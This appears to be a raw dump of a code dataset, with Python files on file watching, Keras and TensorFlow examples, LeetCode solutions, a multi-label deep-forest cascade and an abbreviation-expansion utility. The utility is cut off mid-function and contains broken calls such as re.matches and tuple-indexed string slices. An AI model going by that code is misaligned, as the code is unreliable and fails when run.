EvHandler(LoggingEventHandler):\n def dispatch(self, event):\n print(\"recompiling...\")\n call([\"python\", \"compile.py\"])\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n\npath = \"./templates\"\n\nevent_handler = EvHandler()\n\nobserver = Observer()\nobserver.schedule(event_handler, \"./templates\", recursive=True)\nobserver.schedule(PyHandler(), '.', recursive=False)\n#observer.schedule(event_handler, '../tokens', recursive=True)\nobserver.schedule(event_handler, '../entities', recursive=True)\n\n\nobserver.start()\ntry:\n while True:\n time.sleep(1)\nexcept KeyboardInterrupt:\n observer.stop()\nobserver.join()","sub_path":"site/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"470680726","text":"# import necessary packages\nimport matplotlib\n\nmatplotlib.use(\"Agg\")\nfrom keras.utils import to_categorical\nimport numpy as np\nimport argparse\nimport cv2\nimport os\nfrom keras.models import load_model\nimport random\n\n# handle command line arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-d\", \"--dataset\", required=True,\n help=\"path to input dataset (i.e., directory of images)\")\nargs = ap.parse_args()\n\n# initial parameters\nbatch_size = 64\nimg_dims = (96, 96, 3)\n\nfinal_images = []\nfinal_labels = []\n\n# get images\nwoman_paths = os.path.join(args.dataset, \"female_names.txt\")\nman_paths = os.path.join(args.dataset, \"male_names.txt\")\n\nwoman_list = [line.rstrip('\\n') for line in open(woman_paths)]\nwoman_labels = [1]*len(woman_list)\nman_list = [line.rstrip('\\n') for line in open(man_paths)]\nman_labels = [0]*len(man_list)\n\nimage_paths = woman_list + man_list\nlabels = woman_labels + man_labels\n\ndata = list(zip(image_paths,labels))\nrandom.shuffle(data)\n\nimage_paths = [point[0] for point in data]\nlabels = [point[1] for point in data]\n\nfor idx, image in enumerate(image_paths):\n folder_name = image.split('_')\n if len(folder_name) == 3:\n id_name = folder_name[0] + '_' + folder_name[1]\n elif len(folder_name) == 4:\n id_name = folder_name[0] + '_' + folder_name[1] + '_' + folder_name[2]\n else:\n continue\n image_path = os.path.join(args.dataset, 'lfw', id_name, image)\n img = cv2.imread(image_path)\n if img is None:\n continue\n img = cv2.resize(img, (img_dims[0], img_dims[1]))\n final_images.append(img)\n label = labels[idx]\n final_labels.append(label)\n\n\n# pre-processing\nfinal_images = np.array(final_images, dtype=\"float\") / 255.0\nfinal_labels = np.array(final_labels)\n\nprint(final_labels.shape)\n\ntrainX = final_images\ntrainY = final_labels\n\ntrainY = to_categorical(trainY, num_classes=2)\n\nmodel_path = '/home/giancarlo/Documents/Gender-test/gender-detection-keras/custom_final.model'\nmodel = load_model(model_path)\n\nH = model.evaluate(x=trainX, y=trainY, batch_size = batch_size,verbose=1)\nprint('Loss: ', H[0])\nprint('Accuracy: ', H[1])\n","sub_path":"test_LFW.py","file_name":"test_LFW.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"611300338","text":"class Solution(object):\n def singleNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n # Op1: Hashmap\n dic = {}\n for num in nums:\n dic[num] = dic[num] + 1 if num in dic else 1\n ans = []\n for num in nums:\n if dic[num] == 1:\n ans.append(num)\n return 
ans\n\n\nnums = [1, 2, 1, 3, 2, 5]\ntest = Solution()\nprint(test.singleNumber(nums))","sub_path":"python/260 Single Number III.py","file_name":"260 Single Number III.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"421538286","text":"# Lab 2 Linear Regression\r\nimport tensorflow as tf\r\n\r\nx_train = [1, 2, 3]  # X values of the data\r\ny_train = [1, 2, 3]  # Y values of the data\r\n\r\nW = tf.Variable(tf.random_normal([1]), name=\"weight\")  # Create a node as a Variable; unlike an ordinary variable, a Variable is managed by TensorFlow, and it is given a random initial value.\r\nb = tf.Variable(tf.random_normal([1]), name=\"bias\")  # Create a node as a Variable; unlike an ordinary variable, a Variable is managed by TensorFlow, and it is given a random initial value.\r\n\r\nhypothesis = x_train * W + b  # The hypothesis is X * W + b.\r\n\r\ncost = tf.reduce_mean(tf.square(hypothesis - y_train))  # Define the cost function according to the formula.\r\n\r\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.01)\r\ntrain = optimizer.minimize(cost)\r\n\r\n\r\nsess = tf.Session()  # Create a session.\r\nsess.run(tf.global_variables_initializer())  # global_variables_initializer must be run before any Variable is used.\r\n\r\nfor step in range(2001):  # Run about 2000 iterations.\r\n    sess.run(train)  # Run the train node.\r\n    if(step % 20 == 0):\r\n        print(step, sess.run(cost), sess.run(W), sess.run(b))","sub_path":"Ch.3/Example1.py","file_name":"Example1.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"632374320","text":"#!/usr/bin/env python3\n# encoding: utf-8\nimport logging\nimport signal\nimport asyncio\nfrom pyupcn.tcpcl import TCPCLServer, logger\n\n\nDEFAULT_INCOMING_EID = \"dtn:1\"\nBIND_TO = (\"127.0.0.1\", 42420)\n\n\nasync def listen(loop):\n    async with TCPCLServer(DEFAULT_INCOMING_EID, *BIND_TO, loop=loop) as sink:\n        loop.add_signal_handler(signal.SIGINT, sink.close)\n        await sink.wait_closed()\n        loop.remove_signal_handler(signal.SIGINT)\n\n\n# Enable logging on stdout\nlogger.setLevel(logging.DEBUG)\nconsole = logging.StreamHandler()\nconsole.setLevel(logger.level)\nlogger.addHandler(console)\n\n# Bootstrap event loop\nloop = asyncio.get_event_loop()\ntry:\n    loop.run_until_complete(listen(loop))\nfinally:\n    loop.close()\n","sub_path":"tools/cla/tcpcl_sink.py","file_name":"tcpcl_sink.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"502891638","text":"import os\nimport sys\nfrom pyDANDIA import metadata\n\ndef reset_red_status_for_stage(red_dir,stage_number):\n    \"\"\"Function to reset the reduction status table entries for a given stage.\n    Note that the status for all images will be set to zero (process) except\n    for entries that were flagged as -1 (do not process) by the PREVIOUS\n    stage\"\"\"\n\n    reduction_metadata = metadata.MetaData()\n    reduction_metadata.load_all_metadata(red_dir, 'pyDANDIA_metadata.fits')\n\n    stage_name = 'STAGE_'+str(stage_number)\n\n    image_list = reduction_metadata.reduction_status[1]['IMAGES'].data\n    image_status = reduction_metadata.reduction_status[1]['STAGE_'+str(stage_number-1)].data\n\n    for i,image in enumerate(image_list):\n\n        if '-1' not in image_status[i]:\n            reduction_metadata.update_a_cell_to_layer('reduction_status', i, stage_name, '0')\n\n    reduction_metadata.save_updated_metadata(red_dir,'pyDANDIA_metadata.fits')\n\nif __name__ == '__main__':\n    if len(sys.argv) == 1:\n        red_dir = input('Please enter the path to the reduction directory: ')\n        stage_number = input('Please enter the stage number to reset: ')\n    else:\n        red_dir = sys.argv[1]\n        stage_number = sys.argv[2]\n\n    stage_number = int(stage_number)\n\n    reset_red_status_for_stage(red_dir,stage_number)\n","sub_path":"pyDANDIA/reset_stage_metadata.py","file_name":"reset_stage_metadata.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"18064946","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/07/16 8:23\n# @Author : 于博文\n# @Email : yubowen.njust@gmail.com\n# @File : Read-TFRecord-Example.py\n# @Software: PyCharm\n\nimport tensorflow as tf\n\n# Read the file.\nreader = tf.TFRecordReader()\nfilename_queue = tf.train.string_input_producer([\"Records/output.tfrecords\"])\n_,serialized_example = reader.read(filename_queue)\n\n# Parse the example that was read.\nfeatures = tf.parse_single_example(\n    serialized_example,\n    features={\n        'image_raw':tf.FixedLenFeature([],tf.string),\n        'pixels':tf.FixedLenFeature([],tf.int64),\n        'label':tf.FixedLenFeature([],tf.int64)\n    })\n\nimages = tf.decode_raw(features['image_raw'],tf.uint8)\nlabels = tf.cast(features['label'],tf.int32)\npixels = tf.cast(features['pixels'],tf.int32)\n\nsess = tf.Session()\n\n# Start multiple threads to handle the input data.\ncoord = tf.train.Coordinator()\nthreads = tf.train.start_queue_runners(sess=sess,coord=coord)\n\nfor i in range(500):\n    image, label, pixel = sess.run([images, labels, pixels])\n    print(i,image,label,pixel)","sub_path":"1.tensorflow/TensorFlow实战Google深度学习框架/TFRecord/Read-TFRecord-Example.py","file_name":"Read-TFRecord-Example.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"312145407","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom keras_contrib.layers import CRF\nfrom keras_contrib.losses import crf_loss\nfrom keras_contrib.metrics import crf_viterbi_accuracy\nfrom keras.models import load_model\n# To load the model\ncustom_objects={'CRF': CRF,'crf_loss':crf_loss,'crf_viterbi_accuracy':crf_viterbi_accuracy}\n# To load a persisted model that uses the CRF layer \nBIO_TAGGER = load_model('_BIO_TAGGER.h5', custom_objects = custom_objects)\n\n\n# In[2]:\n\n\nfrom nltk import word_tokenize\n\n\n# In[3]:\n\n\nimport pickle\n\nwith open('_word_to_index.pickle', 'rb') as f1:\n    word_to_index = pickle.load(f1)\n    \nwith open('_index_to_tag.pickle', 'rb') as f2:\n    index_to_tag = pickle.load(f2) \n\nwith open('X_test.pickle', 'rb') as f3:\n    X_test = pickle.load(f3) \n\nwith open('y_test.pickle', 'rb') as f4:\n    y_test = pickle.load(f4) \n\nwith open('_index_to_word.pickle', 'rb') as f5:\n    index_to_word = pickle.load(f5)\n\n\n# In[4]:\n\n\nfrom keras.utils import np_utils\ny_test2 = np_utils.to_categorical(y_test)\n\n\n# In[5]:\n\n\nimport numpy as np\n\n\n# In[6]:\n\n\ni=3\np=BIO_TAGGER.predict(np.array([X_test[i]]))\np=np.argmax(p, axis=-1)\ntrue = np.argmax(y_test2[i],-1)\n\nfor w, t, pred in zip(X_test[i],true, p[0]):\n    if t != 0: # Exclude PAD values.\n        print(\"{:17}: {:30} {}\".format(index_to_word[w], index_to_tag[t], index_to_tag[pred]))\n\n\n# In[7]:\n\n\ntrue\n\n\n# In[8]:\n\n\nfor w, t, pred in zip(X_test[i],true, p[0]):\n    if t != 0: # Exclude PAD values.\n        print(\"{:17}: {:30} {}\".format(index_to_word[w], index_to_tag[t], t))\n\n\n# In[9]:\n\n\n#from keras.utils import np_utils\ny_test2 = np_utils.to_categorical(y_test)\nprint(\"\\n test accuracy: %.4f\" % (BIO_TAGGER.evaluate(X_test, y_test2)[1]))\n\n\n# In[10]:\n\n\nCheck = []\nfor i in range(len(X_test)) : \n    Check.append([])\n
p=BIO_TAGGER.predict(np.array([X_test[i]]))\n p=np.argmax(p, axis=-1)\n true = np.argmax(y_test2[i],-1)\n for j in range(len(true)) :\n if true[j] != 0:\n if p[0][j] == true[j] :\n Check[i].append(1)\n else :\n Check[i].append(0)\n\n\n# In[11]:\n\n\ntrue\n\n\n# In[12]:\n\n\nRatio_right = []\nRatio_wrong = []\n\n\n# In[13]:\n\n\nfor C in Check :\n count=0\n for r in C :\n if r == 1 :\n count += 1\n ratio = count/len(C)\n Ratio_right.append(ratio)\n Ratio_wrong.append(1-ratio)\n\n\n# In[14]:\n\n\nlen(C)\n\n\n# In[15]:\n\n\nfrom numpy import array\nfrom matplotlib import pyplot\n\ndata1 = array(Ratio_right)\ndata2 = array(Ratio_wrong)\npyplot.bar(range(len(data1)), data1, color = \"#0000FF\")\npyplot.bar(range(len(data2)), data2, bottom=data1, color = \"#FF0000\")\n\n\n# In[16]:\n\n\navg2 = np.mean(data1)\nprint(avg2)\n\n\n# In[17]:\n\n\nCheck_1 = []\nfor i in range(len(X_test)) : \n Check_1.append([])\n p=BIO_TAGGER.predict(np.array([X_test[i]]))\n p=np.argmax(p, axis=-1)\n true = np.argmax(y_test2[i],-1)\n for j in range(len(true)) :\n if true[j] != 0 and true[j] != 22: # 첫번째 조건은 패딩 부분 제외, 두번째 조건은 O가 아닌 것들만\n if p[0][j] == true[j] :\n Check_1[i].append(1)\n else :\n Check_1[i].append(0)\n\n\n# In[18]:\n\n\nRatio_right_1 = []\nRatio_wrong_1 = []\n\n\n# In[19]:\n\n\nfor I in range(len(Check_1)) :\n if len(Check_1[i]) == 0 :\n print(i)\n\n\n# In[24]:\n\n\nCheck_1\n\n\n# In[20]:\n\n\nfor C in Check_1 :\n count_1=0\n for r in C :\n if r == 1 :\n count_1 += 1\n if len(C)!=0:\n ratio_1 = count_1/len(C)\n Ratio_right_1.append(ratio_1)\n Ratio_wrong_1.append(1-ratio_1)\n\n\n# In[21]:\n\n\nlen(C)\n\n\n# In[22]:\n\n\nfrom numpy import array\nfrom matplotlib import pyplot\n\ndata1_1 = array(Ratio_right_1)\ndata2_1 = array(Ratio_wrong_1)\npyplot.bar(range(len(data1_1)), data1_1, color = \"#0000FF\")\npyplot.bar(range(len(data2_1)), data2_1, bottom=data1_1, color = \"#FF0000\")\n\n\n# In[23]:\n\n\navg = np.mean(data1_1)\nprint(avg)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"NER/BIO_ACCURACY_VISUALIZATION.py","file_name":"BIO_ACCURACY_VISUALIZATION.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"411030540","text":"\"\"\"\n树级联成森林\n森林最大层数:20\n森林数:2\n\"\"\"\nfrom sklearn.cross_validation import KFold\n# from sklearn.model_selection import KFold\n\nfrom sklearn.model_selection import train_test_split\nfrom .measure import *\nfrom .warpper import KfoldWarpper\n\n\nclass Cascade:\n # 本实验将最大层数(T)设置为20\n def __init__(self, dataname, max_layer=20, num_forests=4, n_fold=5, step=3):\n \"\"\"\n :param dataname: 数据集名称\n :param max_layer: 森林最大层数,设为20\n :param num_forests: 每一层的森林数量,设为2\n :param n_fold: 每一层交叉验证倍数,设为5\n :param step: 迭代次数,设为3\n \"\"\"\n self.max_layer = max_layer\n self.n_fold = n_fold\n self.step = step\n self.layer_list = []\n self.num_forests = num_forests\n self.dataname = dataname\n self.eta = []\n self.model = []\n\n # 针对六个多标签指标(用supervise表示),计算置信度,公式如论文中的表2所示,结果用alpha表示\n # P是预测值矩阵\n def compute_confidence(self, supervise, P):\n \"\"\"\n :param supervise: string (e.g. 
\"hamming loss\", \"one-error\"),即指标\n :param P: array, whose shape is (num_samples, num_labels)\n :return alpha: array, whose shape is :\n (num_samples, ) when supervise is instance-based measure,\n and (num_labels, ) when supervise is label-based measure\n \"\"\"\n m, l = P.shape[0], P.shape[1]\n print(\"计算置信度,当前层的实例数、标签数:\", m, l)\n if supervise == \"hamming loss\":\n alpha = np.sum(np.abs(P - 0.5) + 0.5, axis=0) / m\n elif supervise == \"one-error\":\n alpha = np.max(P, axis=1)\n elif supervise == \"ranking loss\" or supervise == \"average precision\":\n forward_prod = np.sort(P, axis=1)\n backward_prod = 1 - forward_prod\n for j in range(1, l, 1):\n forward_prod[:, j] = forward_prod[:, j - 1] * P[:, j]\n for j in range(l - 2, -1, -1):\n backward_prod[:, j] = backward_prod[:, j + 1] * (1 - P[:, j])\n alpha = forward_prod[:, l - 1] + backward_prod[:, 0]\n for j in range(l - 1):\n alpha += forward_prod[:, j] * backward_prod[:, j + 1]\n elif supervise == \"coverage\":\n backward_prod = 1 - np.sort(P, axis=1)\n for j in range(l - 2, -1, -1):\n backward_prod[:, j] = backward_prod[:, j + 1] * (1 - P[:, j])\n alpha = backward_prod[:, 0]\n for j in range(l - 1):\n alpha += j * P[:, j] * backward_prod[:, j + 1]\n alpha = 1 - alpha / l\n elif supervise == \"macro_auc\":\n forward_prod = np.sort(P, axis=0)\n backward_prod = 1 - P.copy()\n for i in range(1, m, 1):\n forward_prod[i, :] = forward_prod[i - 1, :] * P[i, :]\n for i in range(m - 2, -1, -1):\n backward_prod[i, :] = backward_prod[i + 1, :] * (1 - P[i, :])\n alpha = forward_prod[m - 1, :] + backward_prod[0, :]\n for i in range(m - 1):\n alpha += forward_prod[i, :] * backward_prod[i + 1, :]\n return alpha\n\n # 在第一层中,每个森林中有40棵树,然后比上一层增加20棵树,直到树数达到100\n # 形参中指定了参数默认值,但是调用时以实参为准\n def train(self, train_data_raw, train_label_raw, supervise, n_estimators=40):\n \"\"\"\n :param train_data_raw: array, whose shape is (num_samples, num_features)\n :param train_label_raw: array, whose shape is (num_samples, num_labels)\n :param supervise: string, (e.g. 
\"hamming loss\", \"one-error\")\n :param n_estimators: int, 每个森林块中树的数量,本实验中设为40\n \"\"\"\n # 将参数中的训练集、对应的标签集复制一份\n train_data = train_data_raw.copy()\n train_label = train_label_raw.copy()\n # 标签数取的是训练标签集的列数\n self.num_labels = train_label.shape[1]\n # 初始化指标值,不同的指标初值不同\n best_value = init_supervise(supervise)\n # 统计为改进的层数,若近三层未改进,则停止训练\n bad = 0\n # 初始化一个和train_label矩阵一样规模的矩阵,但元素不是空\n best_train_prob = np.empty(train_label.shape)\n # 初始化一个三维矩阵:每层的森林数、实例数、标签数\n best_concatenate_prob = np.empty([self.num_forests, train_data.shape[0], self.num_labels])\n\n # max_layer = 20,遍历森林的每一层,逐层训练\n for layer_index in range(self.max_layer):\n print(\"训练MLDF模型第\" + str(layer_index) + \"层ing\")\n\n # K折交叉验证:用sklearn.cross_validation 求kf,此包已经弃用,但有n_folds参数\n # 将训练数据集划分len(train_label)个互斥子集,\n # 每次用其中一个子集当作验证集,剩下的len(train_label)-1个作为训练集,\n # 进行len(train_label)次训练和测试,得到len(train_label)个结果\n # 为了防止过拟合,我们对森林的每一层都做了K折交叉验证\n # n_splits 表示划分为几块(至少是2)\n # shuffle 表示是否打乱划分,默认False,即不打乱\n # random_state 随机种子数,表示是否固定随机起点,Used when shuffle == True.\n kf = KFold(len(train_label), n_folds=self.n_fold, shuffle=True, random_state=0)\n\n # print(\"cross_validation求得kf:\", type(kf), kf)\n\n # 用from sklearn.model_selection 求kf\n # shuffle:在每次划分时,是否打乱\n # ①若为Falses时,其效果等同于random_state等于整数,每次划分的结果相同\n # ②若为True时,每次划分的结果都不一样,表示经过洗牌,随机取样的\n # kf = KFold(len(train_label), shuffle=True, random_state=0).split(train_data.shape[0])\n\n # 参数:森林数=2,每个森里中的树的数量=40,n_fold折交叉验证,层序号(1~20,for循环ing),步数=3\n kfoldwarpper = KfoldWarpper(self.num_forests, n_estimators, self.n_fold, kf, layer_index, self.step)\n # 参数:训练集、对应标签集;返回值是[预测值针对森林数取得均值, 按分类器存放的预测值]\n prob, prob_concatenate = kfoldwarpper.train(train_data, train_label)\n\n self.model.append(kfoldwarpper)\n # 第一层\n if layer_index == 0:\n best_train_prob = prob\n # 指标名称,训练标签集,阈值初值为0.5\n pre_metric = compute_supervise_vec(supervise, best_train_prob, train_label, 0.5)\n # 非第一层\n else:\n now_metric = compute_supervise_vec(supervise, prob, train_label, 0.5)\n if supervise == \"average precision\" or supervise == \"macro_auc\":\n indicator = now_metric < pre_metric\n else:\n indicator = now_metric > pre_metric\n\n if np.sum(indicator) > 0:\n # 计算置信度\n confidence = self.compute_confidence(supervise, prob)\n # 取置信度均值作为阈值\n eta_t = np.mean(confidence[indicator])\n\n train_indicator = confidence < eta_t\n if supervise == \"hamming loss\" or supervise == \"macro_auc\":\n prob[:, train_indicator] = best_train_prob[:, train_indicator]\n prob_concatenate[:, :, train_indicator] = best_concatenate_prob[:, :, train_indicator]\n else:\n prob[train_indicator, :] = best_train_prob[train_indicator, :]\n prob_concatenate[:, train_indicator, :] = best_concatenate_prob[:, train_indicator, :]\n else:\n eta_t = 0\n\n self.eta.append(eta_t)\n\n best_train_prob = prob\n\n best_concatenate_prob = prob_concatenate\n\n pre_metric = compute_supervise_vec(supervise, best_train_prob, train_label, 0.5)\n\n value = compute_supervise(supervise, best_train_prob, train_label, 0.5)\n back = compare_supervise_value(supervise, best_value, value)\n if back:\n bad += 1\n else:\n bad = 0\n best_value = value\n\n # 若近3层没有更新,则舍弃当前层模型和阈值\n if bad >= 3:\n print(\"cascade测试bad:\", bad, \",近3层没有更新,则舍弃当前层模型和阈值\")\n for i in range(bad):\n self.model.pop()\n self.eta.pop()\n break\n # 准备下一层数据\n # transpose函数:重新指定0,1,2三个轴的顺序\n prob_concatenate = best_concatenate_prob.transpose((1, 0, 2))\n prob_concatenate = prob_concatenate.reshape(prob_concatenate.shape[0], -1)\n # 将prob_concatenate拼接到train_data_raw下面,行数会改变,所以axis=1\n train_data = 
np.concatenate([train_data_raw.copy(), prob_concatenate], axis=1)\n\n # 针对不同指标,对原始测试数据做预测\n def predict(self, test_data_raw, supervise):\n \"\"\"\n :param test_data_raw: array, whose shape is (num_test_samples, num_features)\n :return prob: array, whose shape is (num_test_samples, num_labels)\n \"\"\"\n test_data = test_data_raw.copy()\n best_prob = np.empty([test_data.shape[0], self.num_labels])\n best_concatenate_prob = np.empty([self.num_forests, test_data.shape[0], self.num_labels])\n # zip()函数,两参数中的两迭代对象一一对应并打包成新对象的一个元素\n # 遍历每层的分类器和每层的阈值\n for clf, eta_t in zip(self.model, self.eta):\n # 分类器预测test_data,得到[预测值针对森林数取的均值, 按分类器存放的预测值]\n prob, prob_concatenate = clf.predict(test_data)\n confidence = self.compute_confidence(supervise, prob)\n indicator = confidence < eta_t\n # print(indicator)\n if supervise == \"hamming loss\" or supervise == \"macro_auc\":\n prob[:, indicator] = best_prob[:, indicator]\n prob_concatenate[:, :, indicator] = best_concatenate_prob[:, :, indicator]\n else:\n prob[indicator, :] = best_prob[indicator, :]\n prob_concatenate[:, indicator, :] = best_concatenate_prob[:, indicator, :]\n best_concatenate_prob = prob_concatenate\n best_prob = prob\n prob_concatenate = best_concatenate_prob.transpose((1, 0, 2))\n prob_concatenate = prob_concatenate.reshape(prob_concatenate.shape[0], -1)\n test_data = np.concatenate([test_data_raw.copy(), prob_concatenate], axis=1)\n return best_prob\n","sub_path":"learner/cascade.py","file_name":"cascade.py","file_ext":"py","file_size_in_byte":11312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"371790381","text":"'''\n253. Meeting Rooms II\n\nGiven an array of meeting time intervals consisting of start and end times [[s1,e1],[s2,e2],...] 
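The two simplest branches of compute_confidence in cascade.py above can be checked by hand; a minimal NumPy sketch (the toy P matrix is illustrative, not from the experiment):

    import numpy as np

    P = np.array([[0.9, 0.2],
                  [0.6, 0.4],
                  [0.1, 0.8]])                     # (num_samples=3, num_labels=2)
    alpha_hamming = np.sum(np.abs(P - 0.5) + 0.5, axis=0) / P.shape[0]
    print(alpha_hamming)                           # [0.8 0.7333...]: label-based, shape (num_labels,)
    alpha_one_error = np.max(P, axis=1)
    print(alpha_one_error)                         # [0.9 0.6 0.8]: instance-based, shape (num_samples,)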
(si < ei), find the minimum number of conference rooms required.\n\nExample 1:\n\nInput: [[0, 30],[5, 10],[15, 20]]\nOutput: 2\nExample 2:\n\nInput: [[7,10],[2,4]]\nOutput: 1\n'''\n\n# Definition for an interval.\n# class Interval(object):\n# def __init__(self, s=0, e=0):\n# self.start = s\n# self.end = e\n\nclass Solution(object):\n def minMeetingRooms(self, intervals):\n \"\"\"\n :type intervals: List[Interval]\n :rtype: int\n \"\"\"\n # Best solution:\n # if len(intervals) == 0:\n # return 0\n # res = 0\n # e = 0\n # end = sorted([i.end for i in intervals])\n # start = sorted([i.start for i in intervals])\n # for i in range(len(intervals)):\n # if start[i] < end[e]:\n # res += 1\n # else:\n # e += 1\n # return res\n \n if len(intervals) < 2:\n return len(intervals)\n intervals = sorted(intervals, key = lambda i: i.start, reverse = False)\n rooms = {}\n num = 1\n rooms[num] = [intervals[0]]\n for meet in intervals[1:]:\n # print meet.start,meet.end,rooms\n i = 1\n while i <= num:\n if meet.start >= rooms[i][-1].end:\n rooms[i].append(meet)\n break\n else:\n i+=1\n if i == num+1:\n num += 1\n rooms[num] = [meet]\n return num\n \n","sub_path":"253_MeetingRoomsII.py","file_name":"253_MeetingRoomsII.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"136862638","text":"# -*- coding: UTF-8 -*-\nimport os\nimport argparse\nimport codecs\nimport re\nimport shutil\nfrom jpype import *\nfrom data import get_fda_file, get_bioc_file\nimport logging\nfrom data_structure import Entity\nimport norm_utils\nfrom options import opt\nimport numpy as np\n\nclass Util:\n @classmethod\n def setMap(self, keyValueListMap, key, value):\n valueList = keyValueListMap.get(key)\n if valueList == None:\n valueList = list()\n keyValueListMap[key] = valueList\n valueList = Util.setList(valueList, value)\n return keyValueListMap\n\n @classmethod\n def setList(self, listt, value):\n if (value not in listt) and (value != u\"\"):\n listt.append(value)\n return listt\n\n @classmethod\n def firstIndexOf(self, tokens, i, pattern):\n while i >=0:\n if re.match(pattern+r\".*\", tokens[i]):\n i -= 1\n return i\n i -= 1\n return -1\n\n @classmethod\n def read(self, file_path):\n with codecs.open(file_path, 'r', 'UTF-8') as fp:\n return fp.read()\n\n @classmethod\n def containsAny(self, first, second):\n first_ = set(first)\n second_ = set(second)\n\n return len(first_ & second_) != 0\n\n @classmethod\n def getTokenIndex (self, tokens, token):\n i = 0\n while i < len(tokens):\n if tokens[i] == token:\n return i\n i += 1\n\n return -1\n\n @classmethod\n def addUnique(self, list, newList):\n for value in newList:\n list = Util.setList(list, value)\n return list\n\n\n\n\nclass Abbreviation:\n wikiAbbreviationExpansionListMap = dict()\n\n\n def __init__(self):\n self.textAbbreviationExpansionMap = dict()\n\n @classmethod\n def setWikiAbbreviationExpansionMap(self, file_path):\n with codecs.open(file_path, 'r', 'UTF-8') as fp:\n for line in fp:\n line = line.strip()\n token = re.split(r\"\\|\\|\", line)\n Abbreviation.wikiAbbreviationExpansionListMap = Util.setMap(Abbreviation.wikiAbbreviationExpansionListMap, token[0].lower(), token[1].lower())\n\n @classmethod\n def clearWikiAbbreviationExpansionMap(self):\n Abbreviation.wikiAbbreviationExpansionListMap.clear()\n\n @classmethod\n def getTentativeExpansion(self, tokens, i, abbreviationLength):\n expansion = u\"\"\n while (i >= 0 and abbreviationLength > 0):\n expansion = tokens[i]+\" 
\"+expansion\n i -= 1\n abbreviationLength -= 1\n\n return expansion.strip()\n\n @classmethod\n def getExpansionByHearstAlgorithm(self, shortForm, longForm):\n sIndex = len(shortForm) - 1\n lIndex = len(longForm) - 1\n\n while(sIndex >= 0):\n currChar = shortForm[sIndex].lower()\n if not currChar.isalnum():\n sIndex -= 1\n continue\n\n while (((lIndex >= 0) and\n (longForm[lIndex].lower() != currChar)) or\n ((sIndex == 0) and (lIndex > 0) and\n (longForm[lIndex-1].isalnum()))):\n lIndex -= 1\n\n if lIndex < 0:\n return u\"\"\n\n lIndex -= 1\n sIndex -= 1\n\n lIndex = longForm.rfind(u\" \", lIndex) + 1\n longForm = longForm[lIndex:]\n\n return longForm\n\n @classmethod\n def getEntireAbbreviation(self, text, string, indexes):\n if len(indexes) != 2:\n return string\n begin = int(indexes[0])\n end = int(indexes[1])\n if re.match(r\"(^|\\s|\\W)[a-zA-Z]/\"+string+r\"/[a-zA-Z](\\s|$|\\W)\", text[begin-3, end+3].lower()) :\n return text[begin-2, end+2].lower()\n elif re.matches(r\"(^|\\s|\\W)\"+string+r\"/[a-zA-Z]/[a-zA-Z](\\s|$|\\W)\", text[begin-1, end+5].lower()):\n return text[begin, end+4].lower()\n elif re.matches(r\"(^|\\s|\\W)[a-zA-Z]/[a-zA-Z]/\"+string+r\"(\\s|$|\\W)\", text[begin-5, end+1].lower()):\n return text[begin-4, end].lower()\n return string\n\n @classmethod\n def getBestExpansion(self, text, expansionList):\n maxNumberOfContentWords = 0\n maxContainedContentWords = 0\n returnExpansion = u\"\"\n for expansion in expansionList:\n expansionContentWordsList = Ling.getContentWordsList(re.split(r\"\\s\", expansion))\n tempNumberOfContentWords = len(expansionContentWordsList)\n tempContainedContentWords = 0\n for expansionContentWord in expansionContentWordsList:\n if text.find(u\" \" + expansionContentWord) != -1 or text.find(expansionContentWord + u\" \") != -1:\n tempContainedContentWords += 1\n\n if tempNumberOfContentWords > maxNumberOfContentWords and tempContainedContentWords == tempNumberOfContentWords:\n maxNumberOfContentWords = tempNumberOfContentWords\n maxContainedContentWords = 1000\n returnExpansion = expansion\n elif tempNumberOfContentWords >= maxNumberOfContentWords and tempContainedContentWords > maxContainedContentWords:\n maxNumberOfContentWords = tempNumberOfContentWords\n maxContainedContentWords = tempContainedContentWords\n returnExpansion = expansion\n\n return returnExpansion\n\n @classmethod\n def getTrimmedExpansion(self, text, string, indexes, expansion):\n if len(indexes) != 2:\n return string\n begin = int(indexes[0])\n end = int(indexes[1])\n if re.matches(r\"(^|\\s|\\W)[a-zA-Z]/\"+string+r\"/[a-zA-Z](\\s|$|\\W)\", text[begin-3, end+3].lower()):\n return expansion[1].lower()\n elif re.matches(r\"(^|\\s|\\W)\"+string+r\"/[a-zA-Z]/[a-zA-Z](\\s|$|\\W)\", text[begin-1, end+5].lower()):\n return expansion[0].lower()\n elif re.matches(r\"(^|\\s|\\W)[a-zA-Z]/[a-zA-Z]/\"+string+r\"(\\s|$|\\W)\", text[begin-5, end+1].lower()):\n return expansion[2].lower()\n return string\n\n @classmethod\n def getAbbreviationExpansion(self, abbreviationObject, text, string, indexes):\n shortForm_longForm_map = 